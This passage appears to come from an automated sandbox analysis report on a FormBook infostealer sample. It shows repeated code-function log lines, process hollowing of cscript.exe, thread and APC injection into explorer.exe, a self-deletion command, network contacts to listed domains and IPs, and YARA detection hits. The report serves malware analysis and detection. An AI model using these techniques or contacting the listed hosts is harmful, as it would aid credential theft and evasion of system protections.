          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04928DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04923D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04897D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0492FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0492FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04888794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04874F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04874F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04944015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04944015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04890050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04890050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04932073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04941074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04888A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04893A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04904257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.fredrika-stahl.com
          Source: C:\Windows\explorer.exeDomain query: www.purpleqube.com
          Source: C:\Windows\explorer.exeDomain query: www.motivactivewear.com
          Source: C:\Windows\explorer.exeDomain query: www.reufhroir.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.95.146 80
          Source: C:\Windows\explorer.exeDomain query: www.tori2020.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80
          Source: C:\Windows\explorer.exeDomain query: www.doodstore.net
          Source: C:\Windows\explorer.exeDomain query: www.mutanterestaurante.com
          Source: C:\Windows\explorer.exeDomain query: www.5xlsteve.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.146.99 80
          Source: C:\Windows\explorer.exeDomain query: www.oceancollaborative.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.124.199 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.9wsc.com
          Source: C:\Windows\explorer.exeDomain query: www.underce.com
          Source: C:\Windows\explorer.exeNetwork Connect: 222.239.248.209 80
          Source: C:\Windows\explorer.exeDomain query: www.kocaelimanliftkiralama.site
          Source: C:\Windows\explorer.exeNetwork Connect: 67.199.248.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.101.32 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Users\user\Desktop\WXs8v9QuE7.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: AC0000
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: explorer.exe, 00000004.00000000.245636520.0000000005EA0000.00000004.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.258808512.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
